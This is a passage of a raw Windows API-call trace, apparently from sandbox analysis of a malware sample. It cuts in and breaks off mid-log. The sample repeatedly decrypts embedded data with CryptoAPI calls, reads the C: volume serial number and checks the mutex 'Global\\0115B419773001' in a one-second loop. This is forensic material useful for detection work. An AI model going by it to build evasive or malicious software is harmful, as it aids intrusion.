hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cbbf68, pdwDataLen=0x2c8f7b4 | out: pbData=0x2cbbf68, pdwDataLen=0x2c8f7b4) returned 1 [0142.268] CryptDestroyKey (hKey=0x1327058) returned 1 [0142.268] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x34) returned 0x2cb13e8 [0142.268] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773001") returned 0x4dc [0142.268] WaitForSingleObject (hHandle=0x4dc, dwMilliseconds=0x0) returned 0x102 [0142.268] CloseHandle (hObject=0x4dc) returned 1 [0142.268] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cbbf68 | out: hHeap=0x2cb0000) returned 1 [0142.268] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb13e8 | out: hHeap=0x2cb0000) returned 1 [0142.268] Sleep (dwMilliseconds=0x3e8) [0143.519] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x20) returned 0x2cb13e8 [0143.519] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f764, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f7cc | out: phKey=0x2c8f7cc*=0x13275d8) returned 1 [0143.519] CryptSetKeyParam (hKey=0x13275d8, dwParam=0x1, pbData=0x2c8f7b4, dwFlags=0x0) returned 1 [0143.519] CryptDecrypt (in: hKey=0x13275d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb13e8, pdwDataLen=0x2c8f780 | out: pbData=0x2cb13e8, pdwDataLen=0x2c8f780) returned 1 [0143.519] CryptDestroyKey (hKey=0x13275d8) returned 1 [0143.519] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x1e) returned 0x2cbbf68 [0143.519] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x1e) returned 0x2cbbf90 [0143.519] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x90) returned 0x2cb04a0 [0143.519] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f73c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f7a4 | out: phKey=0x2c8f7a4*=0x1327598) returned 1 [0143.520] CryptSetKeyParam (hKey=0x1327598, dwParam=0x1, pbData=0x2c8f78c, dwFlags=0x0) returned 1 [0143.520] CryptDecrypt (in: hKey=0x1327598, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb04a0, pdwDataLen=0x2c8f758 | out: pbData=0x2cb04a0, pdwDataLen=0x2c8f758) returned 1 [0143.520] CryptDestroyKey (hKey=0x1327598) returned 1 [0143.520] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb04a0 | out: hHeap=0x2cb0000) returned 1 [0143.520] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2cbbf68, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0143.520] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cbbf90 | out: hHeap=0x2cb0000) returned 1 [0143.520] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb13e8 | out: hHeap=0x2cb0000) returned 1 [0143.520] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x2c8f80c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x2c8f80c*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0143.520] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cbbf68 | out: hHeap=0x2cb0000) returned 1 [0143.520] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x40) returned 0x2cbbf68 [0143.520] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f798, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f800 | out: phKey=0x2c8f800*=0x13273d8) returned 1 [0143.520] CryptSetKeyParam (hKey=0x13273d8, dwParam=0x1, pbData=0x2c8f7e8, dwFlags=0x0) returned 1 [0143.520] CryptDecrypt (in: hKey=0x13273d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cbbf68, pdwDataLen=0x2c8f7b4 | out: pbData=0x2cbbf68, pdwDataLen=0x2c8f7b4) returned 1 [0143.520] CryptDestroyKey (hKey=0x13273d8) returned 1 [0143.520] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x34) returned 0x2cb13e8 [0143.520] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773001") returned 0x4dc [0143.520] WaitForSingleObject (hHandle=0x4dc, dwMilliseconds=0x0) returned 0x102 [0143.520] CloseHandle (hObject=0x4dc) returned 1 [0143.521] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cbbf68 | out: hHeap=0x2cb0000) returned 1 [0143.521] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb13e8 | out: hHeap=0x2cb0000) returned 1 [0143.521] Sleep (dwMilliseconds=0x3e8) [0144.789] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x20) returned 0x2cb13e8 [0144.789] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f764, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f7cc | out: phKey=0x2c8f7cc*=0x13272d8) returned 1 [0144.791] CryptSetKeyParam (hKey=0x13272d8, dwParam=0x1, pbData=0x2c8f7b4, dwFlags=0x0) returned 1 [0144.794] CryptDecrypt (in: hKey=0x13272d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb13e8, pdwDataLen=0x2c8f780 | out: pbData=0x2cb13e8, pdwDataLen=0x2c8f780) returned 1 [0144.794] CryptDestroyKey (hKey=0x13272d8) returned 1 [0144.794] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x1e) returned 0x2cbbf68 [0144.805] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x1e) returned 0x2cbbf90 [0144.805] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x90) returned 0x2cb04a0 [0144.805] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f73c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f7a4 | out: phKey=0x2c8f7a4*=0x13272d8) returned 1 [0144.814] CryptSetKeyParam (hKey=0x13272d8, dwParam=0x1, pbData=0x2c8f78c, dwFlags=0x0) returned 1 [0144.814] CryptDecrypt (in: hKey=0x13272d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb04a0, pdwDataLen=0x2c8f758 | out: pbData=0x2cb04a0, pdwDataLen=0x2c8f758) returned 1 [0144.819] CryptDestroyKey (hKey=0x13272d8) returned 1 [0144.819] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb04a0 | out: hHeap=0x2cb0000) returned 1 [0144.819] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2cbbf68, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0144.819] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cbbf90 | out: hHeap=0x2cb0000) returned 1 [0144.819] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb13e8 | out: hHeap=0x2cb0000) returned 1 [0144.819] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x2c8f80c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x2c8f80c*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0144.819] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cbbf68 | out: hHeap=0x2cb0000) returned 1 [0144.819] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x40) returned 0x2cbbf68 [0144.819] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f798, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f800 | out: phKey=0x2c8f800*=0x13273d8) returned 1 [0144.819] CryptSetKeyParam (hKey=0x13273d8, dwParam=0x1, pbData=0x2c8f7e8, dwFlags=0x0) returned 1 [0144.819] CryptDecrypt (in: hKey=0x13273d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cbbf68, pdwDataLen=0x2c8f7b4 | out: pbData=0x2cbbf68, pdwDataLen=0x2c8f7b4) returned 1 [0144.819] CryptDestroyKey (hKey=0x13273d8) returned 1 [0144.820] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x34) returned 0x2cb13e8 [0144.820] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773001") returned 0x4dc [0144.820] WaitForSingleObject (hHandle=0x4dc, dwMilliseconds=0x0) returned 0x102 [0144.820] CloseHandle (hObject=0x4dc) returned 1 [0144.820] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cbbf68 | out: hHeap=0x2cb0000) returned 1 [0144.820] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb13e8 | out: hHeap=0x2cb0000) returned 1 [0144.820] Sleep (dwMilliseconds=0x3e8) [0146.030] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x20) returned 0x2cb13e8 [0146.030] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f764, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f7cc | out: phKey=0x2c8f7cc*=0x13275d8) returned 1 [0146.030] CryptSetKeyParam (hKey=0x13275d8, dwParam=0x1, pbData=0x2c8f7b4, dwFlags=0x0) returned 1 [0146.030] CryptDecrypt (in: hKey=0x13275d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb13e8, pdwDataLen=0x2c8f780 | out: pbData=0x2cb13e8, pdwDataLen=0x2c8f780) returned 1 [0146.030] CryptDestroyKey (hKey=0x13275d8) returned 1 [0146.030] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x1e) returned 0x2cbbf68 [0146.030] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x1e) returned 0x2cbbf90 [0146.030] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x90) returned 0x2cb04a0 [0146.030] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f73c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f7a4 | out: phKey=0x2c8f7a4*=0x1327498) returned 1 [0146.030] CryptSetKeyParam (hKey=0x1327498, dwParam=0x1, pbData=0x2c8f78c, dwFlags=0x0) returned 1 [0146.030] CryptDecrypt (in: hKey=0x1327498, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb04a0, pdwDataLen=0x2c8f758 | out: pbData=0x2cb04a0, pdwDataLen=0x2c8f758) returned 1 [0146.030] CryptDestroyKey (hKey=0x1327498) returned 1 [0146.030] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb04a0 | out: hHeap=0x2cb0000) returned 1 [0146.030] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2cbbf68, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0146.030] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cbbf90 | out: hHeap=0x2cb0000) returned 1 [0146.030] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb13e8 | out: hHeap=0x2cb0000) returned 1 [0146.030] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x2c8f80c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x2c8f80c*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0146.031] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cbbf68 | out: hHeap=0x2cb0000) returned 1 [0146.031] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x40) returned 0x2cbbf68 [0146.031] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f798, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f800 | out: phKey=0x2c8f800*=0x1326f58) returned 1 [0146.031] CryptSetKeyParam (hKey=0x1326f58, dwParam=0x1, pbData=0x2c8f7e8, dwFlags=0x0) returned 1 [0146.031] CryptDecrypt (in: hKey=0x1326f58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cbbf68, pdwDataLen=0x2c8f7b4 | out: pbData=0x2cbbf68, pdwDataLen=0x2c8f7b4) returned 1 [0146.031] CryptDestroyKey (hKey=0x1326f58) returned 1 [0146.031] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x34) returned 0x2cb13e8 [0146.031] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773001") returned 0x4dc [0146.031] WaitForSingleObject (hHandle=0x4dc, dwMilliseconds=0x0) returned 0x102 [0146.031] CloseHandle (hObject=0x4dc) returned 1 [0146.031] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cbbf68 | out: hHeap=0x2cb0000) returned 1 [0146.031] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb13e8 | out: hHeap=0x2cb0000) returned 1 [0146.031] Sleep (dwMilliseconds=0x3e8) [0147.269] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x20) returned 0x2cb13e8 [0147.269] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f764, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f7cc | out: phKey=0x2c8f7cc*=0x1327498) returned 1 [0147.269] CryptSetKeyParam (hKey=0x1327498, dwParam=0x1, pbData=0x2c8f7b4, dwFlags=0x0) returned 1 [0147.269] CryptDecrypt (in: hKey=0x1327498, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb13e8, pdwDataLen=0x2c8f780 | out: pbData=0x2cb13e8, pdwDataLen=0x2c8f780) returned 1 [0147.269] CryptDestroyKey (hKey=0x1327498) returned 1 [0147.269] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x1e) returned 0x2cbbf68 [0147.269] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x1e) returned 0x2cbbf90 [0147.269] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x90) returned 0x2cb04a0 [0147.269] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f73c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f7a4 | out: phKey=0x2c8f7a4*=0x13272d8) returned 1 [0147.269] CryptSetKeyParam (hKey=0x13272d8, dwParam=0x1, pbData=0x2c8f78c, dwFlags=0x0) returned 1 [0147.269] CryptDecrypt (in: hKey=0x13272d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb04a0, pdwDataLen=0x2c8f758 | out: pbData=0x2cb04a0, pdwDataLen=0x2c8f758) returned 1 [0147.269] CryptDestroyKey (hKey=0x13272d8) returned 1 [0147.270] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb04a0 | out: hHeap=0x2cb0000) returned 1 [0147.270] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2cbbf68, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0147.270] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cbbf90 | out: hHeap=0x2cb0000) returned 1 [0147.270] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb13e8 | out: hHeap=0x2cb0000) returned 1 [0147.270] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x2c8f80c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x2c8f80c*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0147.270] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cbbf68 | out: hHeap=0x2cb0000) returned 1 [0147.270] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x40) returned 0x2cbbf68 [0147.270] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f798, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f800 | out: phKey=0x2c8f800*=0x1327498) returned 1 [0147.270] CryptSetKeyParam (hKey=0x1327498, dwParam=0x1, pbData=0x2c8f7e8, dwFlags=0x0) returned 1 [0147.270] CryptDecrypt (in: hKey=0x1327498, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cbbf68, pdwDataLen=0x2c8f7b4 | out: pbData=0x2cbbf68, pdwDataLen=0x2c8f7b4) returned 1 [0147.270] CryptDestroyKey (hKey=0x1327498) returned 1 [0147.270] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x34) returned 0x2cb13e8 [0147.270] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773001") returned 0x4dc [0147.270] WaitForSingleObject (hHandle=0x4dc, dwMilliseconds=0x0) returned 0x102 [0147.270] CloseHandle (hObject=0x4dc) returned 1 [0147.270] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cbbf68 | out: hHeap=0x2cb0000) returned 1 [0147.270] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb13e8 | out: hHeap=0x2cb0000) returned 1 [0147.270] Sleep (dwMilliseconds=0x3e8) [0148.601] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x20) returned 0x2cb13e8 [0148.601] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f764, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f7cc | out: phKey=0x2c8f7cc*=0x13272d8) returned 1 [0148.601] CryptSetKeyParam (hKey=0x13272d8, dwParam=0x1, pbData=0x2c8f7b4, dwFlags=0x0) returned 1 [0148.601] CryptDecrypt (in: hKey=0x13272d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb13e8, pdwDataLen=0x2c8f780 | out: pbData=0x2cb13e8, pdwDataLen=0x2c8f780) returned 1 [0148.601] CryptDestroyKey (hKey=0x13272d8) returned 1 [0148.601] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x1e) returned 0x2cbbf68 [0148.601] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x1e) returned 0x2cbbf90 [0148.601] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x90) returned 0x2cb04a0 [0148.601] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f73c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f7a4 | out: phKey=0x2c8f7a4*=0x13272d8) returned 1 [0148.601] CryptSetKeyParam (hKey=0x13272d8, dwParam=0x1, pbData=0x2c8f78c, dwFlags=0x0) returned 1 [0148.601] CryptDecrypt (in: hKey=0x13272d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb04a0, pdwDataLen=0x2c8f758 | out: pbData=0x2cb04a0, pdwDataLen=0x2c8f758) returned 1 [0148.601] CryptDestroyKey (hKey=0x13272d8) returned 1 [0148.601] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb04a0 | out: hHeap=0x2cb0000) returned 1 [0148.601] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2cbbf68, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0148.601] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cbbf90 | out: hHeap=0x2cb0000) returned 1 [0148.601] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb13e8 | out: hHeap=0x2cb0000) returned 1 [0148.602] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x2c8f80c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x2c8f80c*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0148.602] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cbbf68 | out: hHeap=0x2cb0000) returned 1 [0148.602] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x40) returned 0x2cbbf68 [0148.602] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f798, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f800 | out: phKey=0x2c8f800*=0x13272d8) returned 1 [0148.602] CryptSetKeyParam (hKey=0x13272d8, dwParam=0x1, pbData=0x2c8f7e8, dwFlags=0x0) returned 1 [0148.602] CryptDecrypt (in: hKey=0x13272d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cbbf68, pdwDataLen=0x2c8f7b4 | out: pbData=0x2cbbf68, pdwDataLen=0x2c8f7b4) returned 1 [0148.602] CryptDestroyKey (hKey=0x13272d8) returned 1 [0148.602] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x34) returned 0x2cb13e8 [0148.602] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773001") returned 0x538 [0148.602] WaitForSingleObject (hHandle=0x538, dwMilliseconds=0x0) returned 0x102 [0148.602] CloseHandle (hObject=0x538) returned 1 [0148.602] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cbbf68 | out: hHeap=0x2cb0000) returned 1 [0148.602] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb13e8 | out: hHeap=0x2cb0000) returned 1 [0148.602] Sleep (dwMilliseconds=0x3e8) [0149.850] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x20) returned 0x2cb13e8 [0149.851] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f764, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f7cc | out: phKey=0x2c8f7cc*=0x13272d8) returned 1 [0149.854] CryptSetKeyParam (hKey=0x13272d8, dwParam=0x1, pbData=0x2c8f7b4, dwFlags=0x0) returned 1 [0149.858] CryptDecrypt (in: hKey=0x13272d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb13e8, pdwDataLen=0x2c8f780 | out: pbData=0x2cb13e8, pdwDataLen=0x2c8f780) returned 1 [0149.864] CryptDestroyKey (hKey=0x13272d8) returned 1 [0149.864] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x1e) returned 0x2cbbf68 [0149.864] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x1e) returned 0x2cbbf90 [0149.864] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x90) returned 0x2cb04a0 [0149.864] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f73c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f7a4 | out: phKey=0x2c8f7a4*=0x13273d8) returned 1 [0149.864] CryptSetKeyParam (hKey=0x13273d8, dwParam=0x1, pbData=0x2c8f78c, dwFlags=0x0) returned 1 [0149.864] CryptDecrypt (in: hKey=0x13273d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb04a0, pdwDataLen=0x2c8f758 | out: pbData=0x2cb04a0, pdwDataLen=0x2c8f758) returned 1 [0149.864] CryptDestroyKey (hKey=0x13273d8) returned 1 [0149.864] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb04a0 | out: hHeap=0x2cb0000) returned 1 [0149.864] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2cbbf68, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0149.864] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cbbf90 | out: hHeap=0x2cb0000) returned 1 [0149.864] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb13e8 | out: hHeap=0x2cb0000) returned 1 [0149.865] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x2c8f80c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x2c8f80c*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0149.865] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cbbf68 | out: hHeap=0x2cb0000) returned 1 [0149.865] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x40) returned 0x2cbbf68 [0149.865] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f798, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f800 | out: phKey=0x2c8f800*=0x1327498) returned 1 [0149.865] CryptSetKeyParam (hKey=0x1327498, dwParam=0x1, pbData=0x2c8f7e8, dwFlags=0x0) returned 1 [0149.865] CryptDecrypt (in: hKey=0x1327498, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cbbf68, pdwDataLen=0x2c8f7b4 | out: pbData=0x2cbbf68, pdwDataLen=0x2c8f7b4) returned 1 [0149.865] CryptDestroyKey (hKey=0x1327498) returned 1 [0149.865] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x34) returned 0x2cb13e8 [0149.865] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773001") returned 0x4dc [0149.865] WaitForSingleObject (hHandle=0x4dc, dwMilliseconds=0x0) returned 0x102 [0149.865] CloseHandle (hObject=0x4dc) returned 1 [0149.865] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cbbf68 | out: hHeap=0x2cb0000) returned 1 [0149.865] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb13e8 | out: hHeap=0x2cb0000) returned 1 [0149.865] Sleep (dwMilliseconds=0x3e8) [0151.125] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x20) returned 0x2cb13e8 [0151.125] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f764, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f7cc | out: phKey=0x2c8f7cc*=0x13272d8) returned 1 [0151.125] CryptSetKeyParam (hKey=0x13272d8, dwParam=0x1, pbData=0x2c8f7b4, dwFlags=0x0) returned 1 [0151.125] CryptDecrypt (in: hKey=0x13272d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb13e8, pdwDataLen=0x2c8f780 | out: pbData=0x2cb13e8, pdwDataLen=0x2c8f780) returned 1 [0151.125] CryptDestroyKey (hKey=0x13272d8) returned 1 [0151.125] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x1e) returned 0x2cbbf68 [0151.125] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x1e) returned 0x2cbbf90 [0151.125] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x90) returned 0x2cb04a0 [0151.125] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f73c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f7a4 | out: phKey=0x2c8f7a4*=0x1327618) returned 1 [0151.125] CryptSetKeyParam (hKey=0x1327618, dwParam=0x1, pbData=0x2c8f78c, dwFlags=0x0) returned 1 [0151.125] CryptDecrypt (in: hKey=0x1327618, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb04a0, pdwDataLen=0x2c8f758 | out: pbData=0x2cb04a0, pdwDataLen=0x2c8f758) returned 1 [0151.125] 